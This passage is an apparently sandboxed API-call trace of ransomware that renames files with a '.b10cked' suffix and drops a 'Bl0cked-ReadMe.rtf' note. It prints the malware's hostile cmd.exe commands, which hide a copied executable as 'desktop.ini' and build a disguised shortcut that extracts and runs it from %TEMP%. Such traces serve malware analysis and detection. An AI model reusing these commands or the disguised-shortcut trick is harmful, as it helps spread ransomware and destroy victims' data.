\"C:\\Users\\ALLUSE~1\\PACKAG~1\\{F325F~1\\state.rsm\" \"C:\\Users\\ALLUSE~1\\PACKAG~1\\{F325F~1\\state.rsm.b10cked\"", lpProcessInformation=0x12ecdc*(hProcess=0x1b4, hThread=0x120, dwProcessId=0xf28, dwThreadId=0x670)) returned 1 [0206.728] CloseHandle (hObject=0x1b4) returned 1 [0206.728] CloseHandle (hObject=0x120) returned 1 [0206.728] CharUpperBuffW (in: lpsz="C:\\Users\\All Users\\Package Cache\\{f325f05b-f963-4640-a43b-c8a494cdda0f}\\", cchLength=0x48 | out: lpsz="C:\\USERS\\ALL USERS\\PACKAGE CACHE\\{F325F05B-F963-4640-A43B-C8A494CDDA0F}\\") returned 0x48 [0206.728] CharUpperBuffW (in: lpsz="C:\\Users\\All Users\\Package Cache\\{e6e75766-da0f-4ba2-9788-6ea593ce702d}\\", cchLength=0x48 | out: lpsz="C:\\USERS\\ALL USERS\\PACKAGE CACHE\\{E6E75766-DA0F-4BA2-9788-6EA593CE702D}\\") returned 0x48 [0206.728] CompareStringW (Locale=0x400, dwCmpFlags=0x0, lpString1="C:\\USERS\\ALL USERS\\PACKAGE CACHE\\{F325F05B-F963-4640-A43B-C8A494CDDA0F}\\", cchCount1=72, lpString2="C:\\USERS\\ALL USERS\\PACKAGE CACHE\\{E6E75766-DA0F-4BA2-9788-6EA593CE702D}\\", cchCount2=72) returned 3 [0206.728] CharUpperBuffW (in: lpsz="C:\\Users\\All Users\\Package Cache\\{f325f05b-f963-4640-a43b-c8a494cdda0f}\\", cchLength=0x48 | out: lpsz="C:\\USERS\\ALL USERS\\PACKAGE CACHE\\{F325F05B-F963-4640-A43B-C8A494CDDA0F}\\") returned 0x48 [0206.728] CharUpperBuffW (in: lpsz="C:\\Users\\EEBsYm5\\Desktop\\", cchLength=0x19 | out: lpsz="C:\\USERS\\EEBSYM5\\DESKTOP\\") returned 0x19 [0206.728] CompareStringW (Locale=0x400, dwCmpFlags=0x0, lpString1="C:\\USERS\\ALL USERS\\PACKAGE CACHE\\{F325F05B-F963-4640-A43B-C8A494CDDA0F}\\", cchCount1=72, lpString2="C:\\USERS\\EEBSYM5\\DESKTOP\\", cchCount2=25) returned 1 [0206.728] GetShortPathNameW (in: lpszLongPath="C:\\Users\\EEBsYm5\\AppData\\Roaming\\Bl0cked-ReadMe.rtf", lpszShortPath=0x1273a8c, cchBuffer=0x103 | out: lpszShortPath="C:\\Users\\EEBsYm5\\AppData\\Roaming\\BL0CKE~1.RTF") returned 0x2d [0206.728] CharUpperBuffW (in: lpsz="type \"[FROM_PATH]\" > 
\"[TO_PATH]\"", cchLength=0x20 | out: lpsz="TYPE \"[FROM_PATH]\" > \"[TO_PATH]\"") returned 0x20 [0206.728] CharUpperBuffW (in: lpsz="[FROM_PATH]", cchLength=0xb | out: lpsz="[FROM_PATH]") returned 0xb [0206.728] GetShortPathNameW (in: lpszLongPath="C:\\Users\\All Users\\Package Cache\\{f325f05b-f963-4640-a43b-c8a494cdda0f}\\", lpszShortPath=0x1273a8c, cchBuffer=0x103 | out: lpszShortPath="C:\\Users\\ALLUSE~1\\PACKAG~1\\{F325F~1\\") returned 0x24 [0206.729] CharUpperBuffW (in: lpsz="type \"C:\\Users\\EEBsYm5\\AppData\\Roaming\\BL0CKE~1.RTF\" > \"[TO_PATH]\"", cchLength=0x42 | out: lpsz="TYPE \"C:\\USERS\\EEBSYM5\\APPDATA\\ROAMING\\BL0CKE~1.RTF\" > \"[TO_PATH]\"") returned 0x42 [0206.729] CharUpperBuffW (in: lpsz="[TO_PATH]", cchLength=0x9 | out: lpsz="[TO_PATH]") returned 0x9 [0206.729] CreateProcessW (in: lpApplicationName=0x0, lpCommandLine="\"C:\\Windows\\system32\\cmd.exe\" /C type \"C:\\Users\\EEBsYm5\\AppData\\Roaming\\BL0CKE~1.RTF\" > \"C:\\Users\\ALLUSE~1\\PACKAG~1\\{F325F~1\\Bl0cked-ReadMe.rtf\"", lpProcessAttributes=0x0, lpThreadAttributes=0x0, bInheritHandles=0, dwCreationFlags=0x30, lpEnvironment=0x0, lpCurrentDirectory=0x0, lpStartupInfo=0x12fb94*(cb=0x0, lpReserved=0x0, lpDesktop=0x0, lpTitle=0x0, dwX=0x0, dwY=0x0, dwXSize=0x0, dwYSize=0x0, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x1, wShowWindow=0x0, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0x0, hStdOutput=0x0, hStdError=0x0), lpProcessInformation=0x12fb84 | out: lpCommandLine="\"C:\\Windows\\system32\\cmd.exe\" /C type \"C:\\Users\\EEBsYm5\\AppData\\Roaming\\BL0CKE~1.RTF\" > \"C:\\Users\\ALLUSE~1\\PACKAG~1\\{F325F~1\\Bl0cked-ReadMe.rtf\"", lpProcessInformation=0x12fb84*(hProcess=0x1b4, hThread=0x120, dwProcessId=0x924, dwThreadId=0x69c)) returned 1 [0206.730] CloseHandle (hObject=0x1b4) returned 1 [0206.730] CloseHandle (hObject=0x120) returned 1 [0206.730] GetFileAttributesW (lpFileName="C:\\Users\\All Users\\Package 
Cache\\{f325f05b-f963-4640-a43b-c8a494cdda0f}\\Bl0cked-ReadMe.rtf" (normalized: "c:\\users\\all users\\package cache\\{f325f05b-f963-4640-a43b-c8a494cdda0f}\\bl0cked-readme.rtf")) returned 0xffffffff [0206.730] GetLastError () returned 0x2 [0206.731] CopyFileW (lpExistingFileName="C:\\Users\\EEBsYm5\\AppData\\Roaming\\Bl0cked-ReadMe.rtf" (normalized: "c:\\users\\eebsym5\\appdata\\roaming\\bl0cked-readme.rtf"), lpNewFileName="C:\\Users\\All Users\\Package Cache\\{f325f05b-f963-4640-a43b-c8a494cdda0f}\\Bl0cked-ReadMe.rtf" (normalized: "c:\\users\\all users\\package cache\\{f325f05b-f963-4640-a43b-c8a494cdda0f}\\bl0cked-readme.rtf"), bFailIfExists=0) returned 1 [0206.735] GetFileAttributesW (lpFileName="C:\\Users\\All Users\\Package Cache\\{f325f05b-f963-4640-a43b-c8a494cdda0f}\\Bl0cked-ReadMe.rtf" (normalized: "c:\\users\\all users\\package cache\\{f325f05b-f963-4640-a43b-c8a494cdda0f}\\bl0cked-readme.rtf")) returned 0x20 [0206.735] CompareStringW (Locale=0x409, dwCmpFlags=0x0, lpString1="\\", cchCount1=1, lpString2="\\", cchCount2=1) returned 2 [0206.736] FindFirstFileW (in: lpFileName="C:\\Users\\All Users\\Package Cache\\{f325f05b-f963-4640-a43b-c8a494cdda0f}", lpFindFileData=0x12f9e4 | out: lpFindFileData=0x12f9e4) returned 0x1fec00 [0206.736] FindClose (in: hFindFile=0x1fec00 | out: hFindFile=0x1fec00) returned 1 [0206.736] CompareStringW (Locale=0x409, dwCmpFlags=0x0, lpString1="\\", cchCount1=1, lpString2="\\", cchCount2=1) returned 2 [0206.736] GetShortPathNameW (in: lpszLongPath="C:\\Users\\EEBsYm5\\AppData\\Roaming\\vMfCCeRYkvQy\\XEY8d7zI.exe", lpszShortPath=0x1273a8c, cchBuffer=0x103 | out: lpszShortPath="C:\\Users\\EEBsYm5\\AppData\\Roaming\\VMFCCE~1\\XEY8d7zI.exe") returned 0x36 [0206.736] CharUpperBuffW (in: lpsz="attrib -r -s -h \"[TO_PATH]\" & del /f /q \"[TO_PATH]\" & type \"[FROM_PATH]\" > \"[TO_PATH]\" && attrib +h \"[TO_PATH]\" && attrib +h \"[TO_DIR]\"", cchLength=0x87 | out: lpsz="ATTRIB -R -S -H \"[TO_PATH]\" & DEL /F /Q \"[TO_PATH]\" & TYPE 
\"[FROM_PATH]\" > \"[TO_PATH]\" && ATTRIB +H \"[TO_PATH]\" && ATTRIB +H \"[TO_DIR]\"") returned 0x87 [0206.736] CharUpperBuffW (in: lpsz="[FROM_PATH]", cchLength=0xb | out: lpsz="[FROM_PATH]") returned 0xb [0206.736] GetShortPathNameW (in: lpszLongPath="C:\\Users\\All Users\\Package Cache\\{f325f05b-f963-4640-a43b-c8a494cdda0f}\\", lpszShortPath=0x123ffac, cchBuffer=0x103 | out: lpszShortPath="C:\\Users\\ALLUSE~1\\PACKAG~1\\{F325F~1\\") returned 0x24 [0206.737] CharUpperBuffW (in: lpsz="attrib -r -s -h \"[TO_PATH]\" & del /f /q \"[TO_PATH]\" & type \"C:\\Users\\EEBsYm5\\AppData\\Roaming\\VMFCCE~1\\XEY8d7zI.exe\" > \"[TO_PATH]\" && attrib +h \"[TO_PATH]\" && attrib +h \"[TO_DIR]\"", cchLength=0xb2 | out: lpsz="ATTRIB -R -S -H \"[TO_PATH]\" & DEL /F /Q \"[TO_PATH]\" & TYPE \"C:\\USERS\\EEBSYM5\\APPDATA\\ROAMING\\VMFCCE~1\\XEY8D7ZI.EXE\" > \"[TO_PATH]\" && ATTRIB +H \"[TO_PATH]\" && ATTRIB +H \"[TO_DIR]\"") returned 0xb2 [0206.737] CharUpperBuffW (in: lpsz="[TO_PATH]", cchLength=0x9 | out: lpsz="[TO_PATH]") returned 0x9 [0206.737] GetShortPathNameW (in: lpszLongPath="C:\\Users\\All Users\\Package Cache\\{f325f05b-f963-4640-a43b-c8a494cdda0f}", lpszShortPath=0x123fd6c, cchBuffer=0x103 | out: lpszShortPath="C:\\Users\\ALLUSE~1\\PACKAG~1\\{F325F~1") returned 0x23 [0206.737] CharUpperBuffW (in: lpsz="attrib -r -s -h \"C:\\Users\\ALLUSE~1\\PACKAG~1\\{F325F~1\\desktop.ini\" & del /f /q \"C:\\Users\\ALLUSE~1\\PACKAG~1\\{F325F~1\\desktop.ini\" & type \"C:\\Users\\EEBsYm5\\AppData\\Roaming\\VMFCCE~1\\XEY8d7zI.exe\" > \"C:\\Users\\ALLUSE~1\\PACKAG~1\\{F325F~1\\desktop.ini\" && attrib +h \"C:\\Users\\ALLUSE~1\\PACKAG~1\\{F325F~1\\desktop.ini\" && attrib +h \"[TO_DIR]\"", cchLength=0x14a | out: lpsz="ATTRIB -R -S -H \"C:\\USERS\\ALLUSE~1\\PACKAG~1\\{F325F~1\\DESKTOP.INI\" & DEL /F /Q \"C:\\USERS\\ALLUSE~1\\PACKAG~1\\{F325F~1\\DESKTOP.INI\" & TYPE \"C:\\USERS\\EEBSYM5\\APPDATA\\ROAMING\\VMFCCE~1\\XEY8D7ZI.EXE\" > \"C:\\USERS\\ALLUSE~1\\PACKAG~1\\{F325F~1\\DESKTOP.INI\" && ATTRIB 
+H \"C:\\USERS\\ALLUSE~1\\PACKAG~1\\{F325F~1\\DESKTOP.INI\" && ATTRIB +H \"[TO_DIR]\"") returned 0x14a [0206.738] CharUpperBuffW (in: lpsz="[TO_DIR]", cchLength=0x8 | out: lpsz="[TO_DIR]") returned 0x8 [0206.738] CreateProcessW (in: lpApplicationName=0x0, lpCommandLine="\"C:\\Windows\\system32\\cmd.exe\" /C attrib -r -s -h \"C:\\Users\\ALLUSE~1\\PACKAG~1\\{F325F~1\\desktop.ini\" & del /f /q \"C:\\Users\\ALLUSE~1\\PACKAG~1\\{F325F~1\\desktop.ini\" & type \"C:\\Users\\EEBsYm5\\AppData\\Roaming\\VMFCCE~1\\XEY8d7zI.exe\" > \"C:\\Users\\ALLUSE~1\\PACKAG~1\\{F325F~1\\desktop.ini\" && attrib +h \"C:\\Users\\ALLUSE~1\\PACKAG~1\\{F325F~1\\desktop.ini\" && attrib +h \"C:\\Users\\ALLUSE~1\\PACKAG~1\\{F325F~1\"", lpProcessAttributes=0x0, lpThreadAttributes=0x0, bInheritHandles=0, dwCreationFlags=0x30, lpEnvironment=0x0, lpCurrentDirectory=0x0, lpStartupInfo=0x12fb88*(cb=0x0, lpReserved=0x0, lpDesktop=0x0, lpTitle=0x0, dwX=0x0, dwY=0x0, dwXSize=0x0, dwYSize=0x0, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x1, wShowWindow=0x0, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0x0, hStdOutput=0x0, hStdError=0x0), lpProcessInformation=0x12fb78 | out: lpCommandLine="\"C:\\Windows\\system32\\cmd.exe\" /C attrib -r -s -h \"C:\\Users\\ALLUSE~1\\PACKAG~1\\{F325F~1\\desktop.ini\" & del /f /q \"C:\\Users\\ALLUSE~1\\PACKAG~1\\{F325F~1\\desktop.ini\" & type \"C:\\Users\\EEBsYm5\\AppData\\Roaming\\VMFCCE~1\\XEY8d7zI.exe\" > \"C:\\Users\\ALLUSE~1\\PACKAG~1\\{F325F~1\\desktop.ini\" && attrib +h \"C:\\Users\\ALLUSE~1\\PACKAG~1\\{F325F~1\\desktop.ini\" && attrib +h \"C:\\Users\\ALLUSE~1\\PACKAG~1\\{F325F~1\"", lpProcessInformation=0x12fb78*(hProcess=0x120, hThread=0x1b4, dwProcessId=0x86c, dwThreadId=0x4f4)) returned 1 [0206.755] WaitForSingleObject (hHandle=0x120, dwMilliseconds=0xffffffff) returned 0x0 [0208.055] CloseHandle (hObject=0x120) returned 1 [0208.055] CloseHandle (hObject=0x1b4) returned 1 [0208.055] CompareStringW (Locale=0x409, dwCmpFlags=0x0, lpString1="\\", 
cchCount1=1, lpString2="\\", cchCount2=1) returned 2 [0208.055] FindFirstFileW (in: lpFileName="C:\\Users\\All Users\\Package Cache\\{f325f05b-f963-4640-a43b-c8a494cdda0f}", lpFindFileData=0x12f9e4 | out: lpFindFileData=0x12f9e4) returned 0x1fec00 [0208.055] FindClose (in: hFindFile=0x1fec00 | out: hFindFile=0x1fec00) returned 1 [0208.097] GetTickCount () returned 0x3a830 [0208.097] QueryPerformanceCounter (in: lpPerformanceCount=0x12fbfc | out: lpPerformanceCount=0x12fbfc*=26488610879) returned 1 [0208.097] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x0, lpMultiByteStr=0x12fbd8, cbMultiByte=1, lpWideCharStr=0x12ebc0, cchWideChar=2047 | out: lpWideCharStr="\x67\x1d\xfbf8\x12\x8400\x1d\x44cd\xd116\xe5d4\xd341\x655a\xb210") returned 1 [0208.097] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x0, lpMultiByteStr=0x12fbd8, cbMultiByte=1, lpWideCharStr=0x12ebc0, cchWideChar=2047 | out: lpWideCharStr="\x43\x1d\xfbf8\x12\x8400\x1d\x44cd\xd116\xe5d4\xd341\x655a\xb210") returned 1 [0208.097] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x0, lpMultiByteStr=0x12fbd8, cbMultiByte=1, lpWideCharStr=0x12ebc0, cchWideChar=2047 | out: lpWideCharStr="\x46\x1d\xfbf8\x12\x8400\x1d\x44cd\xd116\xe5d4\xd341\x655a\xb210") returned 1 [0208.118] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x0, lpMultiByteStr=0x12fbd8, cbMultiByte=1, lpWideCharStr=0x12ebc0, cchWideChar=2047 | out: lpWideCharStr="\x77\x1d\xfbf8\x12\x8400\x1d\x44cd\xd116\xe5d4\xd341\x655a\xb210") returned 1 [0208.118] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x0, lpMultiByteStr=0x12fbd8, cbMultiByte=1, lpWideCharStr=0x12ebc0, cchWideChar=2047 | out: lpWideCharStr="\x73\x1d\xfbf8\x12\x8400\x1d\x44cd\xd116\xe5d4\xd341\x655a\xb210") returned 1 [0208.118] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x0, lpMultiByteStr=0x12fbd8, cbMultiByte=1, lpWideCharStr=0x12ebc0, cchWideChar=2047 | out: lpWideCharStr="\x58\x1d\xfbf8\x12\x8400\x1d\x44cd\xd116\xe5d4\xd341\x655a\xb210") returned 1 [0208.118] 
MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x0, lpMultiByteStr=0x12fbd8, cbMultiByte=1, lpWideCharStr=0x12ebc0, cchWideChar=2047 | out: lpWideCharStr="\x68\x1d\xfbf8\x12\x8400\x1d\x44cd\xd116\xe5d4\xd341\x655a\xb210") returned 1 [0208.118] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x0, lpMultiByteStr=0x12fbd8, cbMultiByte=1, lpWideCharStr=0x12ebc0, cchWideChar=2047 | out: lpWideCharStr="\x59\x1d\xfbf8\x12\x8400\x1d\x44cd\xd116\xe5d4\xd341\x655a\xb210") returned 1 [0208.118] CompareStringW (Locale=0x409, dwCmpFlags=0x0, lpString1="\\", cchCount1=1, lpString2="\\", cchCount2=1) returned 2 [0208.118] CharUpperBuffW (in: lpsz="explorer.exe \"[DIR_NAME]\" & type \"[DIR_NAME]\\[HID_NAME]\" > \"%TEMP%\\[EXE_NAME]\" && \"%TEMP%\\[EXE_NAME]\"", cchLength=0x65 | out: lpsz="EXPLORER.EXE \"[DIR_NAME]\" & TYPE \"[DIR_NAME]\\[HID_NAME]\" > \"%TEMP%\\[EXE_NAME]\" && \"%TEMP%\\[EXE_NAME]\"") returned 0x65 [0208.118] CharUpperBuffW (in: lpsz="[DIR_NAME]", cchLength=0xa | out: lpsz="[DIR_NAME]") returned 0xa [0208.118] CharUpperBuffW (in: lpsz="explorer.exe \"{f325f05b-f963-4640-a43b-c8a494cdda0f}\" & type \"{f325f05b-f963-4640-a43b-c8a494cdda0f}\\[HID_NAME]\" > \"%TEMP%\\[EXE_NAME]\" && \"%TEMP%\\[EXE_NAME]\"", cchLength=0x9d | out: lpsz="EXPLORER.EXE \"{F325F05B-F963-4640-A43B-C8A494CDDA0F}\" & TYPE \"{F325F05B-F963-4640-A43B-C8A494CDDA0F}\\[HID_NAME]\" > \"%TEMP%\\[EXE_NAME]\" && \"%TEMP%\\[EXE_NAME]\"") returned 0x9d [0208.118] CharUpperBuffW (in: lpsz="[HID_NAME]", cchLength=0xa | out: lpsz="[HID_NAME]") returned 0xa [0208.118] CharUpperBuffW (in: lpsz="explorer.exe \"{f325f05b-f963-4640-a43b-c8a494cdda0f}\" & type \"{f325f05b-f963-4640-a43b-c8a494cdda0f}\\desktop.ini\" > \"%TEMP%\\[EXE_NAME]\" && \"%TEMP%\\[EXE_NAME]\"", cchLength=0x9e | out: lpsz="EXPLORER.EXE \"{F325F05B-F963-4640-A43B-C8A494CDDA0F}\" & TYPE \"{F325F05B-F963-4640-A43B-C8A494CDDA0F}\\DESKTOP.INI\" > \"%TEMP%\\[EXE_NAME]\" && \"%TEMP%\\[EXE_NAME]\"") returned 0x9e [0208.118] CharUpperBuffW (in: 
lpsz="[EXE_NAME]", cchLength=0xa | out: lpsz="[EXE_NAME]") returned 0xa [0208.118] CoInitialize (pvReserved=0x0) returned 0x0 [0208.119] CoCreateInstance (in: rclsid=0x4e06a4*(Data1=0x21401, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), pUnkOuter=0x0, dwClsContext=0x5, riid=0x4b0dcc*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppv=0x12fc10 | out: ppv=0x12fc10*=0x1d3e18) returned 0x0 [0208.120] ShellLink:IUnknown:QueryInterface (in: This=0x1d3e18, riid=0x4d36fc*(Data1=0x214f9, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x12fbc8 | out: ppvObject=0x12fbc8*=0x1d3df0) returned 0x0 [0208.120] ShellLink:IUnknown:QueryInterface (in: This=0x1d3e18, riid=0x4d370c*(Data1=0x10b, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x12fbc8 | out: ppvObject=0x12fbc8*=0x1d3dfc) returned 0x0 [0208.120] ShellLink:IShellLinkW:SetPath (This=0x1d3df0, pszFile="%SystemRoot%\\system32\\cmd.exe") returned 0x0 [0208.189] ShellLink:IShellLinkW:SetArguments (This=0x1d3df0, pszArgs="/C explorer.exe \"{f325f05b-f963-4640-a43b-c8a494cdda0f}\" & type \"{f325f05b-f963-4640-a43b-c8a494cdda0f}\\desktop.ini\" > \"%TEMP%\\gCFwsXhY.exe\" && \"%TEMP%\\gCFwsXhY.exe\"") returned 0x0 [0208.189] ShellLink:IShellLinkW:SetWorkingDirectory (This=0x1d3df0, pszDir="%CD%") returned 0x0 [0208.189] ShellLink:IShellLinkW:SetIconLocation (This=0x1d3df0, pszIconPath="%SystemRoot%\\system32\\shell32.dll", iIcon=3) returned 0x0 [0208.189] ShellLink:IShellLinkW:SetShowCmd (This=0x1d3df0, iShowCmd=7) returned 0x0 [0208.189] ShellLink:IPersistFile:Save (This=0x1d3dfc, pszFileName="C:\\Users\\All Users\\Package Cache\\{f325f05b-f963-4640-a43b-c8a494cdda0f}.lnk", fRemember=0) returned 0x0 [0208.196] ShellLink:IUnknown:Release (This=0x1d3dfc) returned 0x2 
[0208.196] ShellLink:IUnknown:Release (This=0x1d3df0) returned 0x1 [0208.196] ShellLink:IUnknown:Release (This=0x1d3e18) returned 0x0 [0208.196] CoUninitialize () [0208.196] WaitForSingleObject (hHandle=0xf8, dwMilliseconds=0xffffffff) returned 0x0 [0208.196] ReleaseMutex (hMutex=0xf8) returned 1 [0208.196] WaitForSingleObject (hHandle=0xf8, dwMilliseconds=0xffffffff) returned 0x0 [0208.197] ReleaseMutex (hMutex=0xf8) returned 1 [0208.197] WaitForSingleObject (hHandle=0xf8, dwMilliseconds=0xffffffff) returned 0x0 [0208.197] ReleaseMutex (hMutex=0xf8) returned 1 [0208.197] WaitForSingleObject (hHandle=0xf8, dwMilliseconds=0xffffffff) returned 0x0 [0208.197] ReleaseMutex (hMutex=0xf8) returned 1 [0208.197] CreateFileW (lpFileName="C:\\Users\\Default\\Contacts\\Administrator.contact" (normalized: "c:\\users\\default\\contacts\\administrator.contact"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x120 [0208.326] SetFilePointer (in: hFile=0x120, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0208.326] SetFilePointer (in: hFile=0x120, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x10b1e [0208.326] SetFilePointer (in: hFile=0x120, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0208.326] QueryPerformanceCounter (in: lpPerformanceCount=0x12ed38 | out: lpPerformanceCount=0x12ed38*=26511539626) returned 1 [0208.326] SetFilePointer (in: hFile=0x120, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0208.326] SetFilePointer (in: hFile=0x120, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x10b1e 
[0208.326] SetFilePointer (in: hFile=0x120, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0208.326] SetFilePointer (in: hFile=0x120, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0208.326] SetFilePointer (in: hFile=0x120, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x10b1e [0208.326] SetFilePointer (in: hFile=0x120, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0208.326] SetFilePointer (in: hFile=0x120, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ecf8*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x12ecf8*=0) returned 0x0 [0208.327] SetFilePointer (in: hFile=0x120, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ecf8*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x12ecf8*=0) returned 0x10b1e [0208.327] SetFilePointer (in: hFile=0x120, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ecf8*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x12ecf8*=0) returned 0x0 [0208.327] SetFilePointer (in: hFile=0x120, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0208.327] SetFilePointer (in: hFile=0x120, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x10b1e [0208.327] SetFilePointer (in: hFile=0x120, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0208.327] SetFilePointer (in: hFile=0x120, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0208.327] SetFilePointer (in: hFile=0x120, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x2 | out: 
lpDistanceToMoveHigh=0x12ed00*=0) returned 0x10b1e [0208.327] SetFilePointer (in: hFile=0x120, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0208.327] SetFilePointer (in: hFile=0x120, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0208.327] SetFilePointer (in: hFile=0x120, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x10b1e [0208.327] SetFilePointer (in: hFile=0x120, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0208.327] SetFilePointer (in: hFile=0x120, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0208.327] SetFilePointer (in: hFile=0x120, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x10b1e [0208.327] SetFilePointer (in: hFile=0x120, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0208.327] SetFilePointer (in: hFile=0x120, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0208.327] SetFilePointer (in: hFile=0x120, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x10b1e [0208.327] SetFilePointer (in: hFile=0x120, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0208.327] SetFilePointer (in: hFile=0x120, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0208.327] SetFilePointer (in: hFile=0x120, lDistanceToMove=0, 
lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x10b1e [0208.327] SetFilePointer (in: hFile=0x120, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0208.327] SetFilePointer (in: hFile=0x120, lDistanceToMove=-1256, lpDistanceToMoveHigh=0x12ecec*=-1, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x12ecec*=0) returned 0x10636 [0208.327] ReadFile (in: hFile=0x120, lpBuffer=0x12ed94, nNumberOfBytesToRead=0x4e8, lpNumberOfBytesRead=0x12ed2c, lpOverlapped=0x0 | out: lpBuffer=0x12ed94*, lpNumberOfBytesRead=0x12ed2c*=0x4e8, lpOverlapped=0x0) returned 1 [0208.399] SetFilePointer (in: hFile=0x120, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ecec*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x12ecec*=0) returned 0x0 [0208.399] SetFilePointer (in: hFile=0x120, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ec60*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x12ec60*=0) returned 0x0 [0208.399] SetFilePointer (in: hFile=0x120, lDistanceToMove=0, 